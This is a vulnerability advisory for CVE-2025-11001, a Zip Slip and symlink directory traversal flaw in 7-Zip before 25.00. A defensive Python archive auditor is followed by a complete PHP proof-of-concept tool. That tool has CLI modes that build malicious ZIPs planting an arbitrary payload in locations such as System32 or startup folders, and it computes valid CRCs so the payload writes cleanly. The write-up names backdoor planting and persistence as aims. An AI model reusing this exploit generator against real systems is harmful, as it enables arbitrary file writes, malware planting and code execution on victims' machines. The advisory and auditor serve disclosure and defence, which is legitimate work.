PACKETSTORM 7.8 HIGH

7-Zip 25.00 Zip Slip Directory Traversal (PACKETSTORM:212101)

7.8 / 10
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Description

7-Zip versions prior to 25.00 suffer from a symlink directory traversal vulnerability (CVE-2025-11001). This write up provides analysis with a proof of concept...

Basic Information

ID PACKETSTORM:212101
Published Nov 26, 2025 at 00:00

Affected Product

=============================================================================================================================================
| # Title : 7-Zip 25.00 Zip Slip Symlink Directory Traversal Vulnerability |
| # Author : indoushka |
| # Tested on : Windows 11 Fr (Pro) / browser : Mozilla Firefox 145.0.1 (64 bits) |
| # Vendor : https://www.7-zip.org/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/211932/ & CVE-2025-11001

[+] Summary :

Multiple archive extraction implementations, including 7‑Zip versions prior to 25.00 and several ZIP libraries, improperly sanitize file paths during extraction.
An attacker can craft a malicious ZIP archive containing:

Directory traversal sequences (../../../)

Symlink entries

Manipulated extra fields

Null‑byte terminated link targets

This allows files to be extracted outside the intended extraction folder and written to arbitrary locations on the victim system.

[+] Vulnerability Class :

Directory Traversal

Arbitrary File Write

Symlink Path Injection

Null-byte truncation bug

[+] Affected Software :

7-Zip < 25.00 (Administrator-only exploitation on Windows, since the symlink variant needs the privilege to create symbolic links)

Any ZIP extraction tool vulnerable to Zip Slip (Java, PHP, Python, WinRAR variants...)

Applications that use ZipArchive without proper sanitization

[+] Impact

A malicious ZIP archive allows an attacker to place files in arbitrary locations such as

C:\Windows\System32\
C:\ProgramData\Microsoft\Windows\Start Menu\
/etc/
/var/www/html/


[+] Possible consequences:

Backdoor planting

Privilege escalation

Persistence via startup folders

Overwriting sensitive files

Code execution, depending on where the written file lands

[+] Technical Details

[+] Core Exploit Mechanism

The attacker inserts filenames such as : ../../../../Windows/System32/evil.exe

or a symlink entry: evil.lnk -> ../../../../Users/Public/Documents\0

A '../' name defeats an extractor that joins the entry name onto the destination directory without normalising and containing the result; a symlink entry defeats one that creates the link and then writes later entries through it, which is the 7-Zip case tracked as CVE-2025-11001. On Windows, creating a symbolic link requires SeCreateSymbolicLinkPrivilege, which a non-elevated process does not hold unless Developer Mode is enabled, so that variant is only exploitable from an elevated 7-Zip, as noted under "Affected Software".
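The checks an extractor (or a gateway scanning inbound archives) should run against each of the four tricks listed in the summary, as an added example in Python that is not part of the original write-up or of 7-Zip. It parses the central directory itself rather than going through Python's zipfile module, because zipfile truncates names at the first NUL on read and would hide that case; the malicious archive it audits is constructed inline with zipfile and is test data, not a sample from the wild. The extraction root /srv/extract and the entry names are assumptions made for the demonstration.

```python
"""Audit a ZIP central directory for the Zip Slip tricks the advisory lists.

Added example: parses the central directory directly because Python's zipfile
strips names at the first NUL on read, which would hide that case.
"""
import io
import os
import re
import struct
import zipfile
from dataclasses import dataclass

CD_SIG, EOCD_SIG = b"PK\x01\x02", b"PK\x05\x06"
S_IFMT, S_IFLNK = 0o170000, 0o120000
UNIX_HOST = 3  # "version made by" high byte; the Unix mode then lives in ext_attr >> 16


@dataclass
class Entry:
    name: str
    is_symlink: bool
    data: bytes  # file content, or the link target for a symlink entry


def build_sample_archive() -> bytes:
    """Constructed test data: a benign file, a '../' traversal name, a Unix
    symlink entry escaping the extraction root, and a NUL-truncated name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("README.txt", b"harmless\n")
        zf.writestr("../../../../tmp/evil.sh", b"#!/bin/sh\necho pwned\n")
        link = zipfile.ZipInfo("docs")
        link.create_system = UNIX_HOST
        link.external_attr = (S_IFLNK | 0o777) << 16  # mode 0120777
        zf.writestr(link, b"../../../../tmp")  # the ZIP format stores a link target as entry data
        nul = zipfile.ZipInfo("notes.txt")
        nul.filename = "notes.txt\x00.exe"  # ZipInfo() itself would strip the NUL
        zf.writestr(nul, b"MZ")
    return buf.getvalue()


def central_directory(data: bytes):
    """Yield one Entry per central directory record (stored entries only)."""
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    count, pos = struct.unpack_from("<H4xI", data, eocd + 10)  # total entries, CD offset
    for _ in range(count):
        (sig, made_by, _, flags, method, _, _, _, csize, _, nlen, xlen, clen,
         _, _, ext_attr, off) = struct.unpack_from("<4sHHHHHHIIIHHHHHII", data, pos)
        if sig != CD_SIG:
            raise ValueError("bad central directory header at %d" % pos)
        raw = data[pos + 46:pos + 46 + nlen]
        name = raw.decode("utf-8" if flags & 0x800 else "cp437")
        lnlen, lxlen = struct.unpack_from("<HH", data, off + 26)  # local header name/extra lengths
        start = off + 30 + lnlen + lxlen
        body = data[start:start + csize] if method == 0 else b""
        is_link = (made_by >> 8) == UNIX_HOST and ((ext_attr >> 16) & S_IFMT) == S_IFLNK
        yield Entry(name, is_link, body)
        pos += 46 + nlen + xlen + clen


def audit(entry: Entry) -> list:
    """Return the Zip Slip indicators found in one entry (empty list = clean)."""
    findings, name = [], entry.name
    if "\x00" in name:
        findings.append("NUL byte in name (truncation bug)")
    if "\\" in name:
        findings.append("backslash separator")
    if ".." in name.replace("\\", "/").split("/"):
        findings.append("parent-directory traversal")
    if name.startswith("/") or re.match(r"^[A-Za-z]:", name):
        findings.append("absolute path")
    if entry.is_symlink:
        target = entry.data.decode("utf-8", "replace")
        findings.append("symlink entry -> %r" % target)
        if target.startswith("/") or ".." in target.split("/"):
            findings.append("symlink target escapes extraction root")
    return findings


def is_contained(root: str, name: str) -> bool:
    """Per-entry check for an extractor: the resolved destination must stay under root."""
    root = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root, name))
    return os.path.commonpath([root, target]) == root


def audit_archive(data: bytes) -> dict:
    return {e.name: audit(e) for e in central_directory(data)}


if __name__ == "__main__":
    for name, findings in audit_archive(build_sample_archive()).items():
        print("%s %r: %s" % ("SLIP" if findings else "OK  ", name, "; ".join(findings) or "clean"))
```

Run stand-alone it prints one line per entry. is_contained is the check a hardened extractor applies to every entry after resolving the destination with realpath, so a symlink created by an earlier entry is followed before the containment decision is made; refusing symlink entries outright is the simpler policy where links are not needed.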

[+] PoC

<?php
/*
===========================================================
By Indoushka (Nekaa Salah eddine)
===========================================================
*/

/* ===========================================================
MODE 1 - Basic Zip Slip Exploit
(Former: build_zip duplicated 4 times)
=========================================================== */
function poc_zip_slip($target_path, $payload_file, $output_zip)
{
if (!file_exists($payload_file)) { die("[-] Payload not found\n"); }

$payload_name = basename($payload_file);
$payload_data = file_get_contents($payload_file);

$target = trim(str_replace("\\", "/", $target_path), "/") . "/";
$traversal = "../../../../" . $target;

$zip = new ZipArchive();
if ($zip->open($output_zip, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== TRUE) {
die("[-] Failed to create ZIP\n");
}

$zip->addFromString($traversal . $payload_name, $payload_data);
$zip->close();

echo "[+] PoC: Zip Slip ZIP created: $output_zip\n";
}


/* ===========================================================
MODE 2 - Manual Symlink ZIP Creator
=========================================================== */
function poc_symlink_zip($target_path, $output_zip)
{
$target = trim(str_replace("\\", "/", $target_path), "/") . "/";
$traversal = "../../../../" . $target;

$name = "evil.lnk";
$link = $traversal . "\x00";                 // NUL-terminated link target

// Extra field (ID 0x756e, ASi Unix) carrying the link target
$extra = pack("v", 0x756e);
$extra .= pack("v", strlen($link));
$extra .= $link;

// Local file header: stored (method 0), UTF-8 name flag (0x800), no data
$local = pack("VvvvvvVVVvv",
0x04034b50, 20, 0x800, 0, 0,0,0,0,0,
strlen($name), strlen($extra)
);

// Central directory entry: host Unix (0x03xx), mode 0120755 (S_IFLNK|0755) in the high 16 bits
$cd = pack("VvvvvvVVVvvvvvVV",
0x02014b50, 0x0317, 20, 0x800, 0, 0,0,0,0,0,
strlen($name), strlen($extra), 0,0,0, (0120755 << 16), 0
);
$cd_start = strlen($local) + strlen($name) + strlen($extra);
$cd_size  = strlen($cd) + strlen($name) + strlen($extra);

// End of central directory record so the file parses as a complete ZIP
$eocd = pack("VvvvvVVv", 0x06054b50, 0,0, 1,1, $cd_size, $cd_start, 0);

file_put_contents($output_zip, $local . $name . $extra . $cd . $name . $extra . $eocd);

echo "[+] PoC: Symlink ZIP created: $output_zip\n";
}


/* ===========================================================
MODE 3 - Full Manual ZIP Builder (Symlink + Payload)
=========================================================== */
function poc_manual_zip($target_path, $payload_file, $output_zip)
{
if (!file_exists($payload_file)) { die("[-] Missing payload\n"); }

$payload_name = basename($payload_file);
$payload_data = file_get_contents($payload_file);
$payload_crc  = crc32($payload_data);

$target = trim(str_replace("\\", "/", $target_path), "/") . "/";
$trav = "../../../../" . $target;

$ln_name = "evil.lnk";
$ln_target = $trav . "\x00";                         // NUL-terminated link target
$ln_extra = pack("v", 0x756e).pack("v",strlen($ln_target)).$ln_target;

$f = fopen($output_zip, "wb");
$off = 0;

// Local: Symlink (stored, no data; link target carried in the extra field)
$h1 = pack("VvvvvvVVVvv",
0x04034b50,20,0x800,0,0,0,0,0,0,strlen($ln_name),strlen($ln_extra)
);
fwrite($f, $h1.$ln_name.$ln_extra);
$symlink_offset = $off;
$off += strlen($h1)+strlen($ln_name)+strlen($ln_extra);

// Local: Payload (stored, real CRC so the extractor does not flag the written file)
$h2 = pack("VvvvvvVVVvv",
0x04034b50,20,0x800,0,0,0,$payload_crc,strlen($payload_data),strlen($payload_data),
strlen($payload_name),0
);
fwrite($f, $h2.$payload_name.$payload_data);
$payload_offset = $off;
$off += strlen($h2)+strlen($payload_name)+strlen($payload_data);

// Central Directory
$cd_start = $off;

// CD: Symlink - host Unix (0x03xx), mode 0120755 (S_IFLNK|0755) in the high 16 bits of the external attributes
$cd1 = pack("VvvvvvVVVvvvvvVV",
0x02014b50,0x0317,20,0x800,0,0,0,0,0,0,
strlen($ln_name),strlen($ln_extra),0,0,0,(0120755<<16),$symlink_offset
);
fwrite($f, $cd1.$ln_name.$ln_extra);
$off += strlen($cd1)+strlen($ln_name)+strlen($ln_extra);

// CD: Payload - regular file, mode 0100777
$cd2 = pack("VvvvvvVVVvvvvvVV",
0x02014b50,0x0317,20,0x800,0,0,0,$payload_crc,
strlen($payload_data),strlen($payload_data),
strlen($payload_name),0,0,0,0,(0100777<<16),$payload_offset
);
fwrite($f, $cd2.$payload_name);
$off += strlen($cd2)+strlen($payload_name);

// EOCD: 2 entries, size of the central directory and its start offset
$eocd = pack("VvvvvVVv",
0x06054b50,0,0,2,2,$off - $cd_start,$cd_start,0
);
fwrite($f, $eocd);
fclose($f);

echo "[+] PoC: Manual ZIP generated: $output_zip\n";
}


/* ===========================================================
MODE 4 - CVE-2025-11001 (7-Zip Directory Traversal)
=========================================================== */
function poc_cve_2025_11001($target, $payload, $output)
{
poc_manual_zip($target, $payload, $output);

echo "[+] CVE-2025-11001 Archive Ready\n";
}


/* ===========================================================
CLI Controller
=========================================================== */

if (php_sapi_name() == "cli")
{
$args = getopt("", [
"mode:",
"target:",
"payload::",
"output::"
]);

if (!isset($args["mode"])) {
die("Usage:\n
php poc.php --mode=zip-slip --target=DIR --payload=file --output=out.zip
php poc.php --mode=symlink --target=DIR --output=out.zip
php poc.php --mode=manual --target=DIR --payload=file --output=out.zip
php poc.php --mode=cve-2025-11001 --target=DIR --payload=file --output=exp.zip
");
}

$mode = $args["mode"];
$target = $args["target"] ?? null;
$payload= $args["payload"] ?? "";
$output = $args["output"] ?? "exploit.zip";

if ($target === null) { die("[-] --target=DIR is required\n"); }

switch ($mode) {
case "zip-slip":
poc_zip_slip($target, $payload, $output);
break;

case "symlink":
poc_symlink_zip($target, $output);
break;

case "manual":
poc_manual_zip($target, $payload, $output);
break;

case "cve-2025-11001":
poc_cve_2025_11001($target, $payload, $output);
break;

default:
echo "Unknown mode.\n";
}
}
?>


Save as : poc.php

run : php poc.php --mode=<zip-slip|symlink|manual|cve-2025-11001> --target=DIR [--payload=file] [--output=out.zip]


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
